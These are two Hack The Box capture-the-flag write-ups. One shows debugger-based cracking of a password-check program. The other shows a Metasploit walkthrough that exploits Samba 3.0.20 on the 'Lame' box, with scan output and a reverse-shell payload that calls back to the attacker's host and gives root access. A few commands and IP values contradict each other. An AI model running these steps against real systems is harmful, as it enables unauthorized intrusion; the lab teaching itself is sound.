HTB: Find the Easy Pass

This challenge focuses on desktop application security, and I’ll do my best to explain in as-layman-as-possible terms what’s going on in each step, however some basic knowledge of the following might help you you in completing this challenge:

  • Debuggers
  • x86 ASM

For this task, we will need a copy of Windows (running in a VM is fine) and a debugger. I suggest the program x64dbg, which we can download for free here

Our first step is to download and unzip the challenge archive, the password is ‘hackthebox’. Once you’ve extracted the EXE, open x32dbg.exe from the x64dbg package. In the x64dbg window, go to File > Open and select the testing executable we extracted. The windows should now look a little bit like this:

This will look like a lot of nonsense to someone just starting out in reverse engineering, but don’t worry! we won’t be worrying about these just yet. For now, click the Right Arrow next to the pause button once to get to the application’s entry point (where the Operating System’s code loading processes stop and the actual application begins), and again to run the actual program. The program then asks for a password:

Entering a bunch of rubbish into the password field gives us the following message:

This, at first, may not seem useful, but take a copy of the message it has just given us, go back into the debugger and press Ctrl + F2 to restart the application. Now enter a tab called References and look for a search bar at the bottom. Put the message text into this box, and you should see this:

The entry we see here is telling us where in memory the string is being used. If we double click it, it will take us to that area in the CPU instruction stack.

Let’s take a look at the red arrow, where it starts from and the instruction before it:

call easypass.404628
jne easypass.454144

This code is doing the following:

  • calling a function within the binary, likely comparing two values (the call instruction)
  • comparing the two values to see if they’re equal. If they are not, skip to another part of the code (the jne instruction)

What we’re going to do is insert what is known as a breakpoint at the call instruction. This will stop the executable from running once it reaches that instruction. We can then step through the code instruction by instruction. Look at the register values (top right corner of the window) while we do this. Let’s run the application again, and once again put gobbledegook in the password field.

The value in the EAX register is our gobbledegook password, but the value in the EDX register is a little more interesting…Note it down and restart the program, entering this new value into the program.

Success! We have cracked the application.

HTB: Lame

This is far and away one of the easiest HTB boxes to complete. All you need is a copy of Nmap and Metasploit, both of which come with Kali Linux.

Start with an Nmap scan:

nmap -sSV -p0- -A 10.10.10.3

Breaking down the command arguments:

  • -sS – TCP SYN Stealth Scan
  • V – Print service versions where possible
  • -p0- – Scan all ports from 0 to 65535
  • -A – Run all safe scripts

The Nmap command should output the following:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-09 22:42 GMT
Nmap scan report for 10.10.10.3
Host is up (0.024s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.24
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h36m16s, deviation: 3h32m10s, median: 6m14s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-02-09T17:50:41-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   23.71 ms 10.10.14.1
2   27.17 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.23 seconds

So there are a few things that are notable:

  • The FTP server allows anonymous access. That means if I run a command such as ftp 10.10.10.3 and login as anonymous with no password, I have access to the FTP server, but the FTP server is empty. Not much can be done with this yet. Moving on.
  • The FTP server is noted as vsftpd 2.3.4 and the SMB server is noted as 3.0.20-Debian

Write these down somewhere, as chances are, we will need them later.

Our next step is to search for exploits. We will do this using a tool called ‘Searchsploit’, built into Kali Linux. First, lets search for vsftpd version 2.3.4:

searchsploit vsftpd 3.2.1

This should return the following:

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb

This tells us that an exploit exists for this service and version, but said exploit code only works with Metasploit – it won’t work with a standard Ruby interpreter like the .rb extension might suggest.

Let’s access Metasploit by launching msfconsole in terminal. You will be greeted by a new prompt that takes a very different set of commands. Commands to be entered into this new terminal will marked out with msf > at the beginning. Lets start by finding our exploit:

msf > search vsftpd

This should return a single entry with the line ‘exploit/unix/ftp/vsftpd_234_backdoor’, which sounds very much like our exploit mentioned in Searchsploit! To use the exploit, we type in the following command:

msf > use exploit/unix/ftp/vsftpd_234_backdoor

Success! we have loaded the exploit! Now to configure it as needed, we need to know what options there are to configure. Type in:

msf > options

You should see the following:

Module options (exploit/unix/ftp/vsftpd_234_backdoor):                                                                                                                                                                                    
                                                                                                                                                                                                                                          
   Name    Current Setting  Required  Description                                                                                                                                                                                         
   ----    ---------------  --------  -----------                                                                                                                                                                                         
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                                                                                                                  
   RPORT   21               yes       The target port (TCP)                                                                                                                                                                               
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          
Payload options (cmd/unix/interact):                                                                                                                                                                                                      
                                                                                                                                                                                                                                          
   Name  Current Setting  Required  Description                                                                                                                                                                                           
   ----  ---------------  --------  -----------                                                                                                                                                                                           
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          
Exploit target:                                                                                                                                                                                                                           
                                                                                                                                                                                                                                          
   Id  Name                                                                                                                                                                                                                               
   --  ----                                                                                                                                                                                                                               
   0   Automatic

Reading through this, we need to set the remote host, or RHOSTS value. We give this the IP of our target like so:

msf > set RHOSTS 10.10.10.3

And with that out of the way, we run the exploit:

msf > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Hmmm. Not quite what we were looking for there. It would appear that this service isn’t vulnerable after all. What do we do now? Maybe there is something in our notes that we haven’t fully covered yet?

Aha! There is another service we can potentially try! Let’s search it in Searchsploit!

> searchsploit samba 3.0.20
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                        | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)              | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                         | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                 | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------- ---------------------------------

That second exploit looks promising, and it’s another Metasploit one.

> msfconsole
msf > search samba username

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution                                                            


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

That looks like our exploit! let’s load it in and see what options we need to fill out

msf > use exploit/multi/samba/usermap_script
msf > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

This time we have a bit more to fill out. Because the payload for this exploit is a reverse shell (meaning: the server is phoning home to us to give us control, rather than us going to the server), we need to tell the payload who to contact. The variable for this is LHOST. It may be filled out automatically, but that does not necessarily mean the value is correct. To derive the correct value, execute ip addr and find the IP address for the interface tun0. Fill out both the LHOST and RHOSTS variables as appropriate and run the exploit.

msf > set LHOST 10.10.14.32
msf > set RHOSTS 10.10.10.3
msf > run

[*] Started reverse TCP handler on 10.10.14.30:4444 
[*] Command shell session 1 opened (10.10.14.30:4444 -> 10.10.10.3:40999) at 2021-02-12 00:36:24 +0000

It may look like nothing is happening, however, if you try to run the command whoami right now, you’ll get the response of root. This means that you are logged into the remote machine as the root user and can go after the flags in /root/root.txt and /home/makis/user.txt. Use the cat command to read the contents of the file.

Congratulations! You’ve passed your first HTB CTF. Unfortunately it was also the easiest one, and others will get a lot more in-depth. It’s all part of the learning process though, and we will be building our understanding of computer security as we go.